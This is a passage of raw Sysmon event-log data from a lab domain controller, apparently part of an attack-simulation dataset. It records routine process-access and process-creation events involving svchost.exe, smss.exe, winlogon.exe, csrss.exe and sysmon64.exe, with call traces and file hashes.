12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-64C1-6064-9000-00000000AE01}40844092C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.191{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 0000007c 10341000x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.178{266CAFBE-6467-6064-0200-00000000AE01}4321028C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.178{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-64C1-6064-9000-00000000AE01}40844092C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.173{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 0000007c 10341000x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 